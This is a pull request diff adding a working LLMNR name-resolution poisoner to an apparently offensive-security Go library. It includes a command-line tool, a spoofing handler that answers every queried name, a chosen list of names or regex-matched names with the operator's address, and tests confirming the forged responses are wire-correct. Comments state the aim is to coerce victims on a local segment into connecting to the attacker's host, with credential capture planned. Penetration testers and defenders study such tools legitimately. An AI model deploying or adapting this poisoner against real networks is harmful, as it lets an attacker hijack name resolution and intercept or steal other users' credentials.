### PR TITLE
Add LLMNR spoofing/poisoning responder and poisoner CLI (Fixes #944)

### DIFF
--- a/cmd/poisoner/main.go
+++ b/cmd/poisoner/main.go
@@ -1,0 +1,229 @@
+// Command poisoner runs a link-local name-resolution poisoner.
+//
+// A poisoner answers name-resolution queries broadcast on the local link for
+// names it does not own, handing back an attacker-chosen (or auto-detected
+// local) address so a victim on the segment connects to this host instead of
+// the intended one. This entrypoint currently drives the LLMNR responder
+// (RFC 4795); it is structured so sibling link-local name protocols (e.g. NBT-NS
+// under network/netbios/nbns) and downstream credential capture can be wired in
+// later without reshaping the command.
+package main
+
+import (
+	"fmt"
+	"net"
+	"os"
+	"regexp"
+	"strings"
+	"sync"
+
+	"github.com/TheManticoreProject/Manticore/logger"
+	"github.com/TheManticoreProject/Manticore/network/llmnr/server"
+	"github.com/TheManticoreProject/goopts/parser"
+)
+
+var (
+	// General
+	debug   bool
+	verbose bool
+
+	// Interface / addresses
+	ifaceName string
+	spoofIPv4 string
+	spoofIPv6 string
+	noIPv4    bool
+	noIPv6    bool
+
+	// Name filtering
+	answerAll     bool
+	spoofNames    []string
+	spoofRegex    string
+	answerOwnName bool
+)
+
+func parseArgs() {
+	ap := parser.ArgumentsParser{
+		Banner: "poisoner - by Remi GASCOU (Podalirius) @ TheManticoreProject - v1.0.0",
+	}
+
+	ap.NewBoolArgument(&debug, "", "--debug", false, "Enable debug mode.")
+	ap.NewBoolArgument(&verbose, "-v", "--verbose", false, "Log every poisoned query.")
+
+	groupNetwork, err := ap.NewArgumentGroup("Network")
+	if err != nil {
+		fmt.Printf("[error] Error creating ArgumentGroup: %s\n", err)
+	} else {
+		groupNetwork.NewStringArgument(&ifaceName, "-i", "--interface", "", false, "Network interface to poison on (default: first non-loopback interface).")
+		groupNetwork.NewStringArgument(&spoofIPv4, "-4", "--spoof-ipv4", "", false, "IPv4 address to answer with (default: the interface's IPv4 address).")
+		groupNetwork.NewStringArgument(&spoofIPv6, "-6", "--spoof-ipv6", "", false, "IPv6 address to answer with (default: the interface's IPv6 address).")
+		groupNetwork.NewBoolArgument(&noIPv4, "", "--no-ipv4", false, "Do not answer A (IPv4) queries.")
+		groupNetwork.NewBoolArgument(&noIPv6, "", "--no-ipv6", false, "Do not answer AAAA (IPv6) queries.")
+	}
+
+	groupFilter, err := ap.NewArgumentGroup("Name filtering")
+	if err != nil {
+		fmt.Printf("[error] Error creating ArgumentGroup: %s\n", err)
+	} else {
+		groupFilter.NewBoolArgument(&answerAll, "-a", "--all", false, "Answer every queried name (aggressive; default when no --name/--regex is given).")
+		groupFilter.NewListOfStringsArgument(&spoofNames, "-n", "--name", []string{}, false, "Only answer this exact name (case-insensitive); may be repeated.")
+		groupFilter.NewStringArgument(&spoofRegex, "-r", "--regex", "", false, "Only answer names matching this regular expression.")
+		groupFilter.NewBoolArgument(&answerOwnName, "", "--answer-own-name", false, "Also answer queries for this host's own hostname (suppressed by default).")
+	}
+
+	ap.Parse()
+}
+
+func main() {
+	parseArgs()
+
+	if debug {
+		logger.SetLevel(logger.LevelDebug)
+	}
+
+	// Resolve the address(es) to hand out: an explicit --spoof-ipv4/-ipv6 wins,
+	// otherwise auto-detect from the selected interface so the victim connects
+	// back to this host.
+	autoV4, autoV6, err := server.InterfaceAddresses(ifaceName)
+	if err != nil && spoofIPv4 == "" && spoofIPv6 == "" {
+		logger.Warnf("Could not auto-detect a local address: %s", err.Error())
+		os.Exit(1)
+	}
+
+	cfg := server.SpoofConfig{
+		AnswerA:             !noIPv4,
+		AnswerAAAA:          !noIPv6,
+		SuppressOwnHostname: !answerOwnName,
+		OwnHostname:         localHostname(),
+		Verbose:             verbose || debug,
+	}
+
+	if !noIPv4 {
+		if spoofIPv4 != "" {
+			cfg.SpoofIPv4 = net.ParseIP(spoofIPv4)
+			if cfg.SpoofIPv4.To4() == nil {
+				logger.Warnf("Invalid --spoof-ipv4 value: %q", spoofIPv4)
+				os.Exit(1)
+			}
+		} else {
+			cfg.SpoofIPv4 = autoV4
+		}
+	}
+	if !noIPv6 {
+		if spoofIPv6 != "" {
+			cfg.SpoofIPv6 = net.ParseIP(spoofIPv6)
+			if cfg.SpoofIPv6 == nil {
+				logger.Warnf("Invalid --spoof-ipv6 value: %q", spoofIPv6)
+				os.Exit(1)
+			}
+		} else {
+			cfg.SpoofIPv6 = autoV6
+		}
+	}
+
+	// Select the name-matching mode from the mutually-informative flags: an
+	// allowlist and a regex are the two selective modes; anything else answers
+	// every name.
+	switch {
+	case len(spoofNames) > 0:
+		cfg.Mode = server.MatchList
+		cfg.Names = spoofNames
+	case spoofRegex != "":
+		re, err := regexp.Compile("(?i)" + spoofRegex)
+		if err != nil {
+			logger.Warnf("Invalid --regex value: %s", err.Error())
+			os.Exit(1)
+		}
+		cfg.Mode = server.MatchRegex
+		cfg.Regex = re
+	default:
+		cfg.Mode = server.MatchAll
+	}
+
+	handler, err := server.NewSpoofHandler(cfg)
+	if err != nil {
+		logger.Warnf("Could not build poisoning handler: %s", err.Error())
+		os.Exit(1)
+	}
+
+	var iface *net.Interface
+	if ifaceName != "" {
+		iface, err = net.InterfaceByName(ifaceName)
+		if err != nil {
+			logger.Warnf("Interface %q: %s", ifaceName, err.Error())
+			os.Exit(1)
+		}
+	}
+
+	logger.Infof("Starting LLMNR poisoner%s", describeTargets(cfg, ifaceName))
+
+	// Run the IPv4 and IPv6 LLMNR responders concurrently so a single invocation
+	// poisons both families. A failure to bind one family (e.g. no IPv6 on the
+	// link) is logged rather than fatal, so the other family keeps working.
+	var wg sync.WaitGroup
+	runLLMNR(&wg, "udp4", iface, handler, debug)
+	runLLMNR(&wg, "udp6", iface, handler, debug)
+	wg.Wait()
+}
+
+// runLLMNR starts one LLMNR responder (IPv4 or IPv6) with the poisoning handler
+// registered, in its own goroutine tracked by wg.
+func runLLMNR(wg *sync.WaitGroup, network string, iface *net.Interface, handler server.Handler, debug bool) {
+	var (
+		srv *server.Server
+		err error
+	)
+	switch network {
+	case "udp4":
+		srv, err = server.NewIPv4ServerWithHandlers([]server.Handler{handler})
+	case "udp6":
+		srv, err = server.NewIPv6ServerWithHandlers([]server.Handler{handler})
+	default:
+		return
+	}
+	if err != nil {
+		logger.Warnf("Failed to create %s LLMNR responder: %s", network, err.Error())
+		return
+	}
+	srv.Interface = iface
+	srv.SetDebug(debug)
+
+	wg.Add(1)
+	go func() {
+		defer wg.Done()
+		if err := srv.ListenAndServe(); err != nil {
+			logger.Warnf("%s LLMNR responder stopped: %s", network, err.Error())
+		}
+	}()
+}
+
+// localHostname returns the host's single-label name (the label a peer would
+// query over LLMNR), lowercased, or "" when it cannot be determined.
+func localHostname() string {
+	h, err := os.Hostname()
+	if err != nil {
+		return ""
+	}
+	if i := strings.IndexByte(h, '.'); i >= 0 {
+		h = h[:i]
+	}
+	return strings.ToLower(h)
+}
+
+// describeTargets renders a short human summary of what the poisoner will answer
+// with, for the startup banner.
+func describeTargets(cfg server.SpoofConfig, ifaceName string) string {
+	parts := []string{}
+	if ifaceName != "" {
+		parts = append(parts, fmt.Sprintf("on %s", ifaceName))
+	}
+	if cfg.SpoofIPv4 != nil {
+		parts = append(parts, fmt.Sprintf("A -> %s", cfg.SpoofIPv4))
+	}
+	if cfg.SpoofIPv6 != nil {
+		parts = append(parts, fmt.Sprintf("AAAA -> %s", cfg.SpoofIPv6))
+	}
+	if len(parts) == 0 {
+		return ""
+	}
+	return " (" + strings.Join(parts, ", ") + ")"
+}

--- a/network/llmnr/server/local_address.go
+++ b/network/llmnr/server/local_address.go
@@ -1,0 +1,70 @@
+package server
+
+import (
+	"fmt"
+	"net"
+)
+
+// InterfaceAddresses returns the first usable IPv4 and IPv6 unicast addresses
+// configured on the named interface, which a poisoner uses to auto-detect the
+// address it should hand out so a coerced victim connects back to this host.
+//
+// When ifaceName is empty the addresses are taken from the first interface that
+// is up, is not loopback, and carries a global-unicast address of the
+// corresponding family. Either return value may be nil if the interface owns no
+// address of that family; an error is returned only when no suitable interface
+// or address could be found at all.
+func InterfaceAddresses(ifaceName string) (ipv4 net.IP, ipv6 net.IP, err error) {
+	if ifaceName != "" {
+		iface, ierr := net.InterfaceByName(ifaceName)
+		if ierr != nil {
+			return nil, nil, fmt.Errorf("interface %q: %w", ifaceName, ierr)
+		}
+		ipv4, ipv6 = interfaceUnicastAddrs(iface)
+		if ipv4 == nil && ipv6 == nil {
+			return nil, nil, fmt.Errorf("interface %q has no usable unicast address", ifaceName)
+		}
+		return ipv4, ipv6, nil
+	}
+
+	ifaces, ierr := net.Interfaces()
+	if ierr != nil {
+		return nil, nil, fmt.Errorf("enumerating interfaces: %w", ierr)
+	}
+	for i := range ifaces {
+		iface := ifaces[i]
+		if iface.Flags&net.FlagUp == 0 || iface.Flags&net.FlagLoopback != 0 {
+			continue
+		}
+		v4, v6 := interfaceUnicastAddrs(&iface)
+		if v4 != nil || v6 != nil {
+			return v4, v6, nil
+		}
+	}
+	return nil, nil, fmt.Errorf("no non-loopback interface with a usable unicast address was found")
+}
+
+// interfaceUnicastAddrs returns the first global-unicast IPv4 and IPv6 addresses
+// configured on iface, or nil for a family the interface does not carry.
+func interfaceUnicastAddrs(iface *net.Interface) (ipv4 net.IP, ipv6 net.IP) {
+	addrs, err := iface.Addrs()
+	if err != nil {
+		return nil, nil
+	}
+	for _, addr := range addrs {
+		ipNet, ok := addr.(*net.IPNet)
+		if !ok || !ipNet.IP.IsGlobalUnicast() {
+			continue
+		}
+		if v4 := ipNet.IP.To4(); v4 != nil {
+			if ipv4 == nil {
+				ipv4 = v4
+			}
+			continue
+		}
+		if ipv6 == nil {
+			ipv6 = ipNet.IP.To16()
+		}
+	}
+	return ipv4, ipv6
+}

--- a/network/llmnr/server/server.go
+++ b/network/llmnr/server/server.go
@@ -40,8 +40,22 @@ type Server struct {
 	// Conn is the connection of the server.
 	Conn *net.UDPConn
 
+	// Interface is the network interface on which the multicast group is joined.
+	// When nil the group is joined on the system-default multicast interface
+	// (preserving the previous behavior); setting it lets the server listen on a
+	// specific link, which matters on multi-homed hosts where the default
+	// multicast interface is not the one carrying the traffic of interest.
+	Interface *net.Interface
+
 	// CloseOnce is a sync.Once struct to ensure the server is closed only once.
 	CloseOnce sync.Once
+
+	// listeningMu guards listening, which records whether the multicast socket
+	// has been bound. It provides a synchronized way for another goroutine (e.g.
+	// a caller that started ListenAndServe in the background) to observe that the
+	// server has come up without racing on the Conn field.
+	listeningMu sync.RWMutex
+	listening   bool
 
 	// Closed is a channel that is closed when the server is shut down.
 	Closed chan struct{}
@@ -332,13 +346,27 @@ func (s *Server) ListenAndServe() error {
 		return fmt.Errorf("invalid network: %s", s.Network)
 	}
 
-	conn, err := net.ListenMulticastUDP(s.Network, nil, s.Address)
+	conn, err := net.ListenMulticastUDP(s.Network, s.Interface, s.Address)
 	if err != nil {
 		return fmt.Errorf("failed to listen: %w", err)
 	}
 	s.Conn = conn
 
+	s.listeningMu.Lock()
+	s.listening = true
+	s.listeningMu.Unlock()
+
 	return s.Serve()
+}
+
+// Listening reports whether the server has bound its multicast socket and is
+// ready to receive queries. It is safe to call concurrently with
+// ListenAndServe, so a caller that starts the server in a background goroutine
+// can poll it to learn when the server is up without racing on the Conn field.
+func (s *Server) Listening() bool {
+	s.listeningMu.RLock()
+	defer s.listeningMu.RUnlock()
+	return s.listening
 }
 
 // Close gracefully shuts down the LLMNR server by closing the UDP connection and signaling the server to stop.
@@ -373,6 +401,9 @@ func (s *Server) ListenAndServe() error {
 func (s *Server) Close() error {
 	s.CloseOnce.Do(
 		func() {
+			s.listeningMu.Lock()
+			s.listening = false
+			s.listeningMu.Unlock()
 			close(s.Closed)
 			if s.Conn != nil {
 				s.Conn.Close()

--- a/network/llmnr/server/server_test.go
+++ b/network/llmnr/server/server_test.go
@@ -69,8 +69,8 @@ func TestIPv4ServerStartAndStop(t *testing.T) {
 
 	time.Sleep(250 * time.Millisecond)
 
-	if server.Conn == nil {
-		t.Error("Expected server connection to be initialized, got nil")
+	if !server.Listening() {
+		t.Error("Expected server to be listening after startup, got not listening")
 	}
 
 	server.Close()
@@ -151,8 +151,8 @@ func TestIPv6ServerStartAndStop(t *testing.T) {
 
 	time.Sleep(250 * time.Millisecond)
 
-	if server.Conn == nil {
-		t.Error("Expected server connection to be initialized, got nil")
+	if !server.Listening() {
+		t.Error("Expected server to be listening after startup, got not listening")
 	}
 
 	server.Close()

--- a/network/llmnr/server/spoof_handler.go
+++ b/network/llmnr/server/spoof_handler.go
@@ -1,0 +1,283 @@
+package server
+
+import (
+	"fmt"
+	"net"
+	"regexp"
+	"strings"
+
+	"github.com/TheManticoreProject/Manticore/logger"
+	"github.com/TheManticoreProject/Manticore/network/llmnr/llmnr_type"
+	"github.com/TheManticoreProject/Manticore/network/llmnr/message"
+)
+
+// MatchMode selects how a SpoofHandler decides whether a queried name should be
+// answered with a spoofed address.
+type MatchMode int
+
+const (
+	// MatchAll answers every queried name (subject to own-hostname suppression).
+	// This is the aggressive default an operator uses to poison a whole segment.
+	MatchAll MatchMode = iota
+
+	// MatchList answers only names present in the case-insensitive allowlist
+	// (SpoofHandler.Names). Any other name is ignored so it can still be resolved
+	// by a legitimate responder on the link.
+	MatchList
+
+	// MatchRegex answers only names matching the configured regular expression
+	// (SpoofHandler.Regex), e.g. `^(wpad|proxy)$`.
+	MatchRegex
+)
+
+// DefaultSpoofTTL is the TTL (in seconds) placed in spoofed answer records when
+// no explicit TTL is configured. RFC 4795 §2.8 RECOMMENDS a default of 30
+// seconds, matching what Windows LLMNR responders emit.
+const DefaultSpoofTTL = 30
+
+// SpoofConfig configures a SpoofHandler.
+//
+// A SpoofHandler answers LLMNR queries for names it does not own with an
+// attacker-chosen address, the classic name-resolution poisoning primitive used
+// to coerce a victim into connecting to the operator's host. Which names are
+// answered is controlled by Mode (answer-all, an exact allowlist, or a regex),
+// and the address returned is taken from SpoofIPv4/SpoofIPv6 (typically a local
+// interface address so the victim connects back to the operator).
+type SpoofConfig struct {
+	// Mode selects the name-matching strategy (MatchAll, MatchList or MatchRegex).
+	Mode MatchMode
+
+	// Names is the case-insensitive allowlist consulted when Mode is MatchList.
+	// Names are compared as single, dot-trimmed labels.
+	Names []string
+
+	// Regex is the regular expression consulted when Mode is MatchRegex. It is
+	// tested against the dot-trimmed queried name.
+	Regex *regexp.Regexp
+
+	// SpoofIPv4 is the IPv4 address returned in A answers. When nil, A queries
+	// are not answered regardless of AnswerA.
+	SpoofIPv4 net.IP
+
+	// SpoofIPv6 is the IPv6 address returned in AAAA answers. When nil, AAAA
+	// queries are not answered regardless of AnswerAAAA.
+	SpoofIPv6 net.IP
+
+	// AnswerA and AnswerAAAA gate which query types are answered. Answering the
+	// type that was asked (A for an A query, AAAA for an AAAA query) matches how
+	// a real responder behaves.
+	AnswerA    bool
+	AnswerAAAA bool
+
+	// TTL is the TTL (seconds) placed in answer records. Zero selects
+	// DefaultSpoofTTL.
+	TTL uint32
+
+	// SuppressOwnHostname, when set, declines to answer queries for OwnHostname
+	// so the poisoner does not shadow legitimate resolution of the host it runs
+	// on (which is both noisy and self-defeating).
+	SuppressOwnHostname bool
+
+	// OwnHostname is the single-label hostname to suppress when
+	// SuppressOwnHostname is set. It is compared case-insensitively.
+	OwnHostname string
+
+	// Verbose logs every query that is answered.
+	Verbose bool
+}
+
+// SpoofHandler is an LLMNR Handler that answers matched query names with a
+// spoofed address. It implements the Handler interface and is registered on a
+// Server like any other handler; because the LLMNR server imposes no
+// authoritative-name restriction, the handler can answer for arbitrary names,
+// which is exactly what a poisoner requires.
+type SpoofHandler struct {
+	mode                MatchMode
+	names               map[string]struct{}
+	regex               *regexp.Regexp
+	spoofIPv4           net.IP
+	spoofIPv6           net.IP
+	answerA             bool
+	answerAAAA          bool
+	ttl                 uint32
+	suppressOwnHostname bool
+	ownHostname         string
+	verbose             bool
+}
+
+// NewSpoofHandler builds a SpoofHandler from cfg, validating that the
+// configuration can actually answer something.
+//
+// It returns an error when no answerable address family is configured (neither a
+// usable A nor a usable AAAA answer), when MatchList is selected with an empty
+// allowlist, or when MatchRegex is selected without a compiled regex, so a
+// misconfigured poisoner fails fast instead of silently answering nothing.
+func NewSpoofHandler(cfg SpoofConfig) (*SpoofHandler, error) {
+	h := &SpoofHandler{
+		mode:                cfg.Mode,
+		regex:               cfg.Regex,
+		answerA:             cfg.AnswerA && cfg.SpoofIPv4 != nil,
+		answerAAAA:          cfg.AnswerAAAA && cfg.SpoofIPv6 != nil,
+		ttl:                 cfg.TTL,
+		suppressOwnHostname: cfg.SuppressOwnHostname,
+		ownHostname:         normalizeName(cfg.OwnHostname),
+		verbose:             cfg.Verbose,
+	}
+	if h.ttl == 0 {
+		h.ttl = DefaultSpoofTTL
+	}
+	if ip := cfg.SpoofIPv4.To4(); ip != nil {
+		h.spoofIPv4 = ip
+	}
+	if cfg.SpoofIPv6 != nil {
+		h.spoofIPv6 = cfg.SpoofIPv6.To16()
+	}
+
+	if !h.answerA && !h.answerAAAA {
+		return nil, fmt.Errorf("spoof handler has no answerable address family: set AnswerA with a SpoofIPv4 and/or AnswerAAAA with a SpoofIPv6")
+	}
+
+	switch cfg.Mode {
+	case MatchAll:
+		// Nothing further to configure.
+	case MatchList:
+		if len(cfg.Names) == 0 {
+			return nil, fmt.Errorf("match mode MatchList requires a non-empty name allowlist")
+		}
+		h.names = make(map[string]struct{}, len(cfg.Names))
+		for _, name := range cfg.Names {
+			h.names[normalizeName(name)] = struct{}{}
+		}
+	case MatchRegex:
+		if cfg.Regex == nil {
+			return nil, fmt.Errorf("match mode MatchRegex requires a compiled regex")
+		}
+	default:
+		return nil, fmt.Errorf("unknown match mode %d", cfg.Mode)
+	}
+
+	return h, nil
+}
+
+// normalizeName lowercases a name and strips a single trailing dot so that
+// matching is case-insensitive and insensitive to a fully-qualified trailing
+// separator, mirroring how DNS/LLMNR names compare.
+func normalizeName(name string) string {
+	return strings.ToLower(strings.TrimSuffix(name, "."))
+}
+
+// Matches reports whether name should be answered under the handler's match
+// mode and own-hostname suppression. It is exported to make the matching logic
+// directly testable and reusable.
+func (h *SpoofHandler) Matches(name string) bool {
+	n := normalizeName(name)
+
+	if h.suppressOwnHostname && h.ownHostname != "" && n == h.ownHostname {
+		return false
+	}
+
+	switch h.mode {
+	case MatchAll:
+		return true
+	case MatchList:
+		_, ok := h.names[n]
+		return ok
+	case MatchRegex:
+		return h.regex != nil && h.regex.MatchString(n)
+	default:
+		return false
+	}
+}
+
+// BuildResponse assembles the spoofed response for msg without transmitting it.
+//
+// The returned message copies the query's transaction ID and sets the QR
+// (response) flag (via CreateResponseFromMessage), then for every question whose
+// name matches and whose type is one the handler answers, it appends an answer
+// record carrying the configured spoof address. Each answer builder re-adds the
+// corresponding question, so the response echoes the question section a real
+// responder (and this project's own validating resolver) expects.
+//
+// It returns (nil, false) when no question matched, so the caller can leave the
+// query for another handler or another responder on the link.
+func (h *SpoofHandler) BuildResponse(msg *message.Message) (*message.Message, bool) {
+	response := message.CreateResponseFromMessage(msg)
+
+	answered := false
+	for _, q := range msg.Questions {
+		name := string(q.Name)
+		if !h.Matches(name) {
+			continue
+		}
+
+		switch q.Type {
+		case llmnr_type.TypeA:
+			if !h.answerA {
+				continue
+			}
+			if err := response.AddAnswerClassINTypeA(name, h.spoofIPv4.String()); err != nil {
+				continue
+			}
+		case llmnr_type.TypeAAAA:
+			if !h.answerAAAA {
+				continue
+			}
+			if err := response.AddAnswerClassINTypeAAAA(name, h.spoofIPv6.String()); err != nil {
+				continue
+			}
+		default:
+			// Only address queries are poisoned; other types are left alone.
+			continue
+		}
+
+		// Override the TTL the answer builders hardcode with the configured one.
+		response.Answers[len(response.Answers)-1].TTL = h.ttl
+		answered = true
+	}
+
+	if !answered {
+		return nil, false
+	}
+	return response, true
+}
+
+// Run implements the Handler interface. It builds a spoofed response for the
+// incoming query and, if a name matched, unicasts it back to the querying host
+// via the ResponseWriter (which directs it to the source port the query came
+// from, per RFC 4795 §2.3).
+//
+// It returns false to stop the handler chain when the query was answered, and
+// true to let subsequent handlers run when nothing matched.
+func (h *SpoofHandler) Run(server *Server, remoteAddr net.Addr, writer ResponseWriter, msg *message.Message) bool {
+	response, ok := h.BuildResponse(msg)
+	if !ok {
+		return true
+	}
+
+	if err := writer.WriteMessage(response); err != nil {
+		if h.verbose {
+			logger.Warnf("Failed to send spoofed LLMNR response to [%s]: %s", remoteAddr.String(), err.Error())
+		}
+		return false
+	}
+
+	if h.verbose {
+		for _, q := range msg.Questions {
+			if !h.Matches(string(q.Name)) {
+				continue
+			}
+			switch q.Type {
+			case llmnr_type.TypeA:
+				if h.answerA {
+					logger.Infof("Poisoned [%s] query for \"%s\" (A) -> %s", remoteAddr.String(), q.Name, h.spoofIPv4.String())
+				}
+			case llmnr_type.TypeAAAA:
+				if h.answerAAAA {
+					logger.Infof("Poisoned [%s] query for \"%s\" (AAAA) -> %s", remoteAddr.String(), q.Name, h.spoofIPv6.String())
+				}
+			}
+		}
+	}
+
+	return false
+}

--- a/network/llmnr/server/spoof_handler_test.go
+++ b/network/llmnr/server/spoof_handler_test.go
@@ -1,0 +1,306 @@
+package server_test
+
+import (
+	"net"
+	"regexp"
+	"testing"
+
+	"github.com/TheManticoreProject/Manticore/network/llmnr/class"
+	"github.com/TheManticoreProject/Manticore/network/llmnr/llmnr_type"
+	"github.com/TheManticoreProject/Manticore/network/llmnr/message"
+	"github.com/TheManticoreProject/Manticore/network/llmnr/server"
+)
+
+// newQuery builds a single-question LLMNR query for name/qtype, mirroring what a
+// victim on the link would multicast.
+func newQuery(t *testing.T, name string, qtype llmnr_type.Type) *message.Message {
+	t.Helper()
+	msg := message.NewMessage()
+	msg.SetQuery()
+	if err := msg.AddQuestion(name, qtype, class.ClassIN); err != nil {
+		t.Fatalf("AddQuestion(%q): %v", name, err)
+	}
+	return msg
+}
+
+// captureWriter is a ResponseWriter that records the message written to it
+// instead of transmitting it, so Run can be exercised without a socket.
+type captureWriter struct {
+	written *message.Message
+	remote  net.Addr
+}
+
+func (w *captureWriter) WriteMessage(msg *message.Message) error {
+	msg.SetResponse()
+	w.written = msg
+	return nil
+}
+
+func (w *captureWriter) GetRemoteAddr() net.Addr { return w.remote }
+
+// TestSpoofHandlerAnswerWireCorrectnessA verifies that a spoofed A response is
+// wire-correct: it copies the transaction ID, sets the QR (response) flag,
+// echoes the question, and carries a single A answer with the configured spoof
+// IP and TTL.
+func TestSpoofHandlerAnswerWireCorrectnessA(t *testing.T) {
+	spoof := net.ParseIP("10.7.0.8")
+	h, err := server.NewSpoofHandler(server.SpoofConfig{
+		Mode:      server.MatchAll,
+		AnswerA:   true,
+		SpoofIPv4: spoof,
+		TTL:       30,
+	})
+	if err != nil {
+		t.Fatalf("NewSpoofHandler: %v", err)
+	}
+
+	query := newQuery(t, "wpad", llmnr_type.TypeA)
+	resp, ok := h.BuildResponse(query)
+	if !ok {
+		t.Fatal("expected the query to be answered")
+	}
+
+	if !resp.IsResponse() {
+		t.Error("response does not have the QR flag set")
+	}
+	if resp.Header.Identifier != query.Header.Identifier {
+		t.Errorf("response ID = %#04x, want %#04x (query ID must be copied)", resp.Header.Identifier, query.Header.Identifier)
+	}
+
+	if len(resp.Questions) != 1 {
+		t.Fatalf("response has %d questions, want 1 (question must be echoed)", len(resp.Questions))
+	}
+	if string(resp.Questions[0].Name) != "wpad" || resp.Questions[0].Type != llmnr_type.TypeA {
+		t.Errorf("echoed question = %q/%s, want wpad/A", resp.Questions[0].Name, resp.Questions[0].Type.String())
+	}
+
+	if len(resp.Answers) != 1 {
+		t.Fatalf("response has %d answers, want 1", len(resp.Answers))
+	}
+	ans := resp.Answers[0]
+	if ans.Type != llmnr_type.TypeA {
+		t.Errorf("answer type = %s, want A", ans.Type.String())
+	}
+	if string(ans.Name) != "wpad" {
+		t.Errorf("answer name = %q, want wpad", ans.Name)
+	}
+	if ans.TTL != 30 {
+		t.Errorf("answer TTL = %d, want 30", ans.TTL)
+	}
+	got, err := ans.AsA()
+	if err != nil {
+		t.Fatalf("AsA: %v", err)
+	}
+	if !got.Equal(spoof) {
+		t.Errorf("answer address = %s, want %s", got, spoof)
+	}
+
+	// The response must survive a marshal/unmarshal round-trip unchanged, which
+	// is what a real resolver on the link parses.
+	encoded, err := resp.Marshal()
+	if err != nil {
+		t.Fatalf("Marshal: %v", err)
+	}
+	decoded := message.Message{}
+	if _, err := decoded.Unmarshal(encoded); err != nil {
+		t.Fatalf("Unmarshal: %v", err)
+	}
+	if !decoded.IsResponse() || len(decoded.Answers) != 1 {
+		t.Fatalf("round-tripped response malformed: QR=%v answers=%d", decoded.IsResponse(), len(decoded.Answers))
+	}
+	rtIP, err := decoded.Answers[0].AsA()
+	if err != nil || !rtIP.Equal(spoof) {
+		t.Errorf("round-tripped answer address = %v (err %v), want %s", rtIP, err, spoof)
+	}
+}
+
+// TestSpoofHandlerAnswerWireCorrectnessAAAA verifies the same wire correctness
+// for an AAAA answer.
+func TestSpoofHandlerAnswerWireCorrectnessAAAA(t *testing.T) {
+	spoof := net.ParseIP("fe80::dead:beef")
+	h, err := server.NewSpoofHandler(server.SpoofConfig{
+		Mode:       server.MatchAll,
+		AnswerAAAA: true,
+		SpoofIPv6:  spoof,
+	})
+	if err != nil {
+		t.Fatalf("NewSpoofHandler: %v", err)
+	}
+
+	resp, ok := h.BuildResponse(newQuery(t, "fileserver", llmnr_type.TypeAAAA))
+	if !ok {
+		t.Fatal("expected the query to be answered")
+	}
+	if len(resp.Answers) != 1 || resp.Answers[0].Type != llmnr_type.TypeAAAA {
+		t.Fatalf("expected a single AAAA answer, got %d answers", len(resp.Answers))
+	}
+	if resp.Answers[0].TTL != server.DefaultSpoofTTL {
+		t.Errorf("answer TTL = %d, want default %d", resp.Answers[0].TTL, server.DefaultSpoofTTL)
+	}
+	got, err := resp.Answers[0].AsAAAA()
+	if err != nil {
+		t.Fatalf("AsAAAA: %v", err)
+	}
+	if !got.Equal(spoof) {
+		t.Errorf("answer address = %s, want %s", got, spoof)
+	}
+}
+
+// TestSpoofHandlerMatchModes covers the three name-matching modes and
+// own-hostname suppression.
+func TestSpoofHandlerMatchModes(t *testing.T) {
+	v4 := net.ParseIP("10.0.0.1")
+
+	t.Run("all", func(t *testing.T) {
+		h, err := server.NewSpoofHandler(server.SpoofConfig{Mode: server.MatchAll, AnswerA: true, SpoofIPv4: v4})
+		if err != nil {
+			t.Fatalf("NewSpoofHandler: %v", err)
+		}
+		for _, name := range []string{"wpad", "anything", "SomeHost"} {
+			if !h.Matches(name) {
+				t.Errorf("MatchAll should match %q", name)
+			}
+		}
+	})
+
+	t.Run("list-case-insensitive", func(t *testing.T) {
+		h, err := server.NewSpoofHandler(server.SpoofConfig{
+			Mode:      server.MatchList,
+			Names:     []string{"WPAD", "proxy"},
+			AnswerA:   true,
+			SpoofIPv4: v4,
+		})
+		if err != nil {
+			t.Fatalf("NewSpoofHandler: %v", err)
+		}
+		if !h.Matches("wpad") {
+			t.Error("allowlist should match wpad case-insensitively")
+		}
+		if !h.Matches("PROXY") {
+			t.Error("allowlist should match PROXY case-insensitively")
+		}
+		if h.Matches("fileserver") {
+			t.Error("allowlist should not match an unlisted name")
+		}
+		// A query for an unlisted name yields no response.
+		if _, ok := h.BuildResponse(newQuery(t, "fileserver", llmnr_type.TypeA)); ok {
+			t.Error("BuildResponse should decline an unlisted name")
+		}
+	})
+
+	t.Run("regex", func(t *testing.T) {
+		h, err := server.NewSpoofHandler(server.SpoofConfig{
+			Mode:      server.MatchRegex,
+			Regex:     regexp.MustCompile(`^wpad.*$`),
+			AnswerA:   true,
+			SpoofIPv4: v4,
+		})
+		if err != nil {
+			t.Fatalf("NewSpoofHandler: %v", err)
+		}
+		if !h.Matches("wpad") || !h.Matches("wpadproxy") {
+			t.Error("regex should match wpad-prefixed names")
+		}
+		if h.Matches("fileserver") {
+			t.Error("regex should not match a non-matching name")
+		}
+	})
+
+	t.Run("own-hostname-suppression", func(t *testing.T) {
+		h, err := server.NewSpoofHandler(server.SpoofConfig{
+			Mode:                server.MatchAll,
+			AnswerA:             true,
+			SpoofIPv4:           v4,
+			SuppressOwnHostname: true,
+			OwnHostname:         "MyHost",
+		})
+		if err != nil {
+			t.Fatalf("NewSpoofHandler: %v", err)
+		}
+		if h.Matches("myhost") {
+			t.Error("own hostname should be suppressed (case-insensitively)")
+		}
+		if !h.Matches("otherhost") {
+			t.Error("a non-own name should still match")
+		}
+	})
+}
+
+// TestSpoofHandlerTypeGating verifies that a query type the handler is not
+// configured to answer is left unanswered.
+func TestSpoofHandlerTypeGating(t *testing.T) {
+	// IPv4-only handler must not answer AAAA queries.
+	h, err := server.NewSpoofHandler(server.SpoofConfig{
+		Mode:      server.MatchAll,
+		AnswerA:   true,
+		SpoofIPv4: net.ParseIP("10.0.0.1"),
+	})
+	if err != nil {
+		t.Fatalf("NewSpoofHandler: %v", err)
+	}
+	if _, ok := h.BuildResponse(newQuery(t, "wpad", llmnr_type.TypeAAAA)); ok {
+		t.Error("IPv4-only handler should not answer an AAAA query")
+	}
+	if _, ok := h.BuildResponse(newQuery(t, "wpad", llmnr_type.TypeA)); !ok {
+		t.Error("IPv4-only handler should answer an A query")
+	}
+}
+
+// TestSpoofHandlerRun exercises the Handler.Run path end to end through a
+// capturing ResponseWriter, confirming a matched query produces a response that
+// stops the handler chain, while an unmatched query passes through.
+func TestSpoofHandlerRun(t *testing.T) {
+	h, err := server.NewSpoofHandler(server.SpoofConfig{
+		Mode:      server.MatchList,
+		Names:     []string{"wpad"},
+		AnswerA:   true,
+		SpoofIPv4: net.ParseIP("10.7.0.8"),
+	})
+	if err != nil {
+		t.Fatalf("NewSpoofHandler: %v", err)
